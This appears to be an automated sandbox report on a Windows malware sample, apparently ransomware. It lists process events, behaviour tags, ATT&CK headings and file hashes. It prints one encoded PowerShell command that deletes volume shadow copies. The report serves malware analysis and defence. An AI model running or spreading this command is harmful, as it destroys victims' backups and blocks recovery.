description pid process target process PID 1588 wrote to memory of 544 1588 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe PID 1588 wrote to memory of 544 1588 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe PID 1588 wrote to memory of 544 1588 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe PID 1588 wrote to memory of 544 1588 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe PID 544 wrote to memory of 1520 544 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe powershell.exe PID 544 wrote to memory of 1520 544 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe powershell.exe PID 544 wrote to memory of 1520 544 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe powershell.exe PID 544 wrote to memory of 1520 544 d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe powershell.exe
Processes 5
-
C:\Users\Admin\AppData\Local\Temp\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exePID:1588"C:\Users\Admin\AppData\Local\Temp\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe"Modifies system executable filetype associationLoads dropped DLLDrops file in Program Files directoryDrops file in Windows directoryModifies registry classSuspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exePID:544"C:\Users\Admin\AppData\Local\Temp\3582-490\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe"Executes dropped EXEModifies extensions of user filesAdds Run key to start applicationEnumerates connected drivesDrops file in System32 directorySets desktop wallpaper using registryDrops file in Program Files directorySuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:1520powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==Suspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exePID:620C:\Windows\system32\wbem\unsecapp.exe -Embedding
-
C:\Windows\system32\vssvc.exePID:1632C:\Windows\system32\vssvc.exeSuspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Defense Evasion
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Privilege Escalation
Replay Monitor
00:00
00:00
Downloads
-
C:\Users\Admin\AppData\Local\Temp\3582-490\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
MD5a055246b0e804eb3a1dda52937f556ef
SHA16807425e1252f1154664fc8072dde03558ed35fe
SHA256a29f63484f53d2cf832b2bc70d6b66378b87b86221f885d0f43166503d631ef3
SHA51218b2308905d95dff7a2a3e2cd3559325d6e3cfdeb45c48e3fd6df0fdbaee27ea3e191cc344505ad2e32f4136de6c8d2b2bbbac121486002707f1a617e2a49a95
-
\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
MD59e2b9928c89a9d0da1d3e8f4bd96afa7
SHA1ec66cda99f44b62470c6930e5afda061579cde35
SHA2568899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043
SHA5122ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156
-
\Users\Admin\AppData\Local\Temp\3582-490\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
MD5a055246b0e804eb3a1dda52937f556ef
SHA16807425e1252f1154664fc8072dde03558ed35fe
SHA256a29f63484f53d2cf832b2bc70d6b66378b87b86221f885d0f43166503d631ef3
SHA51218b2308905d95dff7a2a3e2cd3559325d6e3cfdeb45c48e3fd6df0fdbaee27ea3e191cc344505ad2e32f4136de6c8d2b2bbbac121486002707f1a617e2a49a95
-
\Users\Admin\AppData\Local\Temp\3582-490\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
MD5a055246b0e804eb3a1dda52937f556ef
SHA16807425e1252f1154664fc8072dde03558ed35fe
SHA256a29f63484f53d2cf832b2bc70d6b66378b87b86221f885d0f43166503d631ef3
SHA51218b2308905d95dff7a2a3e2cd3559325d6e3cfdeb45c48e3fd6df0fdbaee27ea3e191cc344505ad2e32f4136de6c8d2b2bbbac121486002707f1a617e2a49a95
-
memory/1520-62-0x0000000002462000-0x0000000002464000-memory.dmp
-
memory/1520-59-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp
-
memory/1520-63-0x0000000002464000-0x0000000002467000-memory.dmp
-
memory/1520-60-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
-
memory/1520-64-0x000000001B750000-0x000000001BA4F000-memory.dmp
-
memory/1520-65-0x000000000246B000-0x000000000248A000-memory.dmp
-
memory/1520-61-0x0000000002460000-0x0000000002462000-memory.dmp
-
memory/1588-54-0x0000000076151000-0x0000000076153000-memory.dmp
Title
Loading data